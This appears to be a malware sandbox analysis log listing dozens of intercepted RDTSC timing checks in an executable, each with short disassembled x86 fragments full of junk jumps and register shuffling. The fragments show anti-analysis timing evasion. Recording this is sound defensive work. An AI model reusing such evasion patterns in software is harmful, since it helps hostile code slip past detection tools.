Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0872 second address: 4FF088E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF088E second address: 4FF0894 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0894 second address: 4FF08D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d jmp 00007FFAEC5291ACh 0x00000012 mov ch, 96h 0x00000014 popad 0x00000015 push dword ptr [ebp+08h] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAEC5291B8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF09AE second address: 4FF09B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF09B4 second address: 4FF09B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF09B8 second address: 4FF09FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a mov cx, dx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FFAEC5267E7h 0x00000015 add ecx, 6E79967Eh 0x0000001b jmp 00007FFAEC5267E9h 0x00000020 popfd 0x00000021 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF09FF second address: 4FE000E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a leave 0x0000000b jmp 00007FFAEC5291B0h 0x00000010 retn 0004h 0x00000013 nop 0x00000014 sub esp, 04h 0x00000017 xor ebx, ebx 0x00000019 cmp eax, 00000000h 0x0000001c je 00007FFAEC5293ADh 0x00000022 mov dword ptr [esp], 0000000Dh 0x00000029 call 00007FFAF122F321h 0x0000002e mov edi, edi 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FFAEC5291AAh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE000E second address: 4FE0014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0014 second address: 4FE0018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0018 second address: 4FE00B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FFAEC5267E2h 0x00000011 jmp 00007FFAEC5267E5h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007FFAEC5267E0h 0x0000001d add ax, 2F98h 0x00000022 jmp 00007FFAEC5267DBh 0x00000027 popfd 0x00000028 popad 0x00000029 call 00007FFAEC5267E8h 0x0000002e pushfd 0x0000002f jmp 00007FFAEC5267E2h 0x00000034 sbb ecx, 57D13128h 0x0000003a jmp 00007FFAEC5267DBh 0x0000003f popfd 0x00000040 pop eax 0x00000041 popad 0x00000042 mov dword ptr [esp], ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE00B7 second address: 4FE00BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE00BB second address: 4FE00C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE00C1 second address: 4FE00C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE00C7 second address: 4FE00CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE00CB second address: 4FE00DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movsx ebx, cx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE00DB second address: 4FE0172 instructions: 0x00000000 rdtsc 0x00000002 mov ax, 2C15h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FFAEC5267E2h 0x0000000d pushfd 0x0000000e jmp 00007FFAEC5267E2h 0x00000013 add ecx, 67F4F918h 0x00000019 jmp 00007FFAEC5267DBh 0x0000001e popfd 0x0000001f pop esi 0x00000020 popad 0x00000021 sub esp, 2Ch 0x00000024 pushad 0x00000025 call 00007FFAEC5267E5h 0x0000002a mov esi, 61931BB7h 0x0000002f pop eax 0x00000030 pushfd 0x00000031 jmp 00007FFAEC5267DDh 0x00000036 sub eax, 11A21566h 0x0000003c jmp 00007FFAEC5267E1h 0x00000041 popfd 0x00000042 popad 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FFAEC5267DDh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0172 second address: 4FE0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0178 second address: 4FE01DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FFAEC5267E9h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FFAEC5267DEh 0x00000017 xchg eax, edi 0x00000018 jmp 00007FFAEC5267E0h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FFAEC5267DDh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE01DD second address: 4FE01E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE01E1 second address: 4FE01E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE01E7 second address: 4FE01FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5291B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE01FE second address: 4FE0202 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0202 second address: 4FE021D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAEC5291B0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE021D second address: 4FE0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0223 second address: 4FE0227 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0280 second address: 4FE0284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0284 second address: 4FE028A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE028A second address: 4FE02A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5267E9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE02A7 second address: 4FE02D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAEC5291B2h 0x00000013 sub al, 00000068h 0x00000016 jmp 00007FFAEC5291ABh 0x0000001b popfd 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE02D7 second address: 4FE0329 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 6EB49F0Ah 0x00000008 call 00007FFAEC5267DBh 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FFAEC5269D9h 0x00000017 jmp 00007FFAEC5267DFh 0x0000001c lea ecx, dword ptr [ebp-14h] 0x0000001f pushad 0x00000020 mov bx, C336h 0x00000024 popad 0x00000025 mov dword ptr [ebp-14h], edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FFAEC5267E8h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0343 second address: 4FE035E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE035E second address: 4FE0376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5267E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0376 second address: 4FE0416 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov eax, 15B490EBh 0x00000012 mov ah, 50h 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 call 00007FFAEC5291B8h 0x0000001c call 00007FFAEC5291B2h 0x00000021 pop ecx 0x00000022 pop edi 0x00000023 movzx ecx, di 0x00000026 popad 0x00000027 nop 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FFAEC5291B9h 0x0000002f sbb cl, 00000076h 0x00000032 jmp 00007FFAEC5291B1h 0x00000037 popfd 0x00000038 push eax 0x00000039 push edx 0x0000003a pushfd 0x0000003b jmp 00007FFAEC5291AEh 0x00000040 sub cx, E898h 0x00000045 jmp 00007FFAEC5291ABh 0x0000004a popfd 0x0000004b rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE043D second address: 4FE04B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 28FBAA28h 0x00000009 popad 0x0000000a popad 0x0000000b jg 00007FFB5E5D481Ah 0x00000011 jmp 00007FFAEC5267E7h 0x00000016 js 00007FFAEC526862h 0x0000001c jmp 00007FFAEC5267E6h 0x00000021 cmp dword ptr [ebp-14h], edi 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FFAEC5267DDh 0x0000002d sub cx, F3A6h 0x00000032 jmp 00007FFAEC5267E1h 0x00000037 popfd 0x00000038 mov di, cx 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE04B0 second address: 4FE04B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE04B5 second address: 4FE0502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 180B5B5Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFB5E5D47B0h 0x00000012 pushad 0x00000013 pushad 0x00000014 mov esi, edx 0x00000016 pushfd 0x00000017 jmp 00007FFAEC5267E3h 0x0000001c jmp 00007FFAEC5267E3h 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, esi 0x00000025 popad 0x00000026 mov ebx, dword ptr [ebp+08h] 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push edx 0x0000002d pop esi 0x0000002e mov dh, 20h 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0502 second address: 4FE0508 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0508 second address: 4FE050C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE050C second address: 4FE0510 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0510 second address: 4FE057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b jmp 00007FFAEC5267E3h 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov eax, 389B0F8Bh 0x00000017 mov bx, cx 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007FFAEC5267DDh 0x00000021 xchg eax, esi 0x00000022 jmp 00007FFAEC5267DEh 0x00000027 nop 0x00000028 jmp 00007FFAEC5267E0h 0x0000002d push eax 0x0000002e jmp 00007FFAEC5267DBh 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov ecx, ebx 0x00000039 pushad 0x0000003a popad 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0600 second address: 4FE0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0606 second address: 4FE060A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E28 second address: 4FD0E4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAEC5291ADh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E4D second address: 4FD0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E53 second address: 4FD0E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E57 second address: 4FD0E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E66 second address: 4FD0E6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E6A second address: 4FD0E70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E70 second address: 4FD0E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5291B9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0E8D second address: 4FD0EDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5267E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FFAEC5267E3h 0x00000015 add cx, 820Eh 0x0000001a jmp 00007FFAEC5267E9h 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0EDE second address: 4FD0F16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAEC5291B3h 0x00000009 sub ax, 401Eh 0x0000000e jmp 00007FFAEC5291B9h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FD0F52 second address: 4FD0F64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAEC5267DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0A32 second address: 4FE0A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0A37 second address: 4FE0A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0A3D second address: 4FE0A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0A41 second address: 4FE0A45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0B19 second address: 4FE0B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0B1D second address: 4FE0B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0B23 second address: 4FE0B9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2EFE5ACBh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FFAEC5291AEh 0x00000017 sbb ah, 00000068h 0x0000001a jmp 00007FFAEC5291ABh 0x0000001f popfd 0x00000020 jmp 00007FFAEC5291B8h 0x00000025 popad 0x00000026 call 00007FFB5E5CE19Eh 0x0000002b push 77082B70h 0x00000030 push dword ptr fs:[00000000h] 0x00000037 mov eax, dword ptr [esp+10h] 0x0000003b mov dword ptr [esp+10h], ebp 0x0000003f lea ebp, dword ptr [esp+10h] 0x00000043 sub esp, eax 0x00000045 push ebx 0x00000046 push esi 0x00000047 push edi 0x00000048 mov eax, dword ptr [770E4538h] 0x0000004d xor dword ptr [ebp-04h], eax 0x00000050 xor eax, ebp 0x00000052 push eax 0x00000053 mov dword ptr [ebp-18h], esp 0x00000056 push dword ptr [ebp-08h] 0x00000059 mov eax, dword ptr [ebp-04h] 0x0000005c mov dword ptr [ebp-04h], FFFFFFFEh 0x00000063 mov dword ptr [ebp-08h], eax 0x00000066 lea eax, dword ptr [ebp-10h] 0x00000069 mov dword ptr fs:[00000000h], eax 0x0000006f ret 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 pushfd 0x00000074 jmp 00007FFAEC5291ADh 0x00000079 jmp 00007FFAEC5291ABh 0x0000007e popfd 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0B9E second address: 4FE0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0BA3 second address: 4FE0BDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAEC5291B5h 0x00000009 add cl, FFFFFF96h 0x0000000c jmp 00007FFAEC5291B1h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 sub esi, esi 0x00000019 pushad 0x0000001a mov ch, bh 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0BDE second address: 4FE0C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFAEC5267E0h 0x0000000a and eax, 5136B0E8h 0x00000010 jmp 00007FFAEC5267DBh 0x00000015 popfd 0x00000016 popad 0x00000017 popad 0x00000018 mov dword ptr [ebp-1Ch], esi 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CA9 second address: 4FE0CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CAE second address: 4FE0CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CB4 second address: 4FE0CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CB8 second address: 4FE0CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CBC second address: 4FE0CD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CD1 second address: 4FE0CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CD5 second address: 4FE0CE4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAEC5291ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FE0CE4 second address: 4FE0CEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0A43 second address: 4FF0ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAEC5291AFh 0x00000009 and si, E69Eh 0x0000000e jmp 00007FFAEC5291B9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FFAEC5291B0h 0x0000001a xor si, 1898h 0x0000001f jmp 00007FFAEC5291ABh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov edx, 095FE786h 0x00000031 call 00007FFAEC5291B7h 0x00000036 pop ecx 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\L8ChrKrbqV.exe	RDTSC instruction interceptor: First address: 4FF0ABC second address: 4FF0B2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAEC5267E4h 0x00000009 xor ax, 1D58h 0x0000000e jmp 00007FFAEC5267DBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FFAEC5267E8h 0x0000001a or esi, 3CB027B8h 0x00000020 jmp 00007FFAEC5267DBh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FFAEC5267E4h 0x00000031 rdtsc
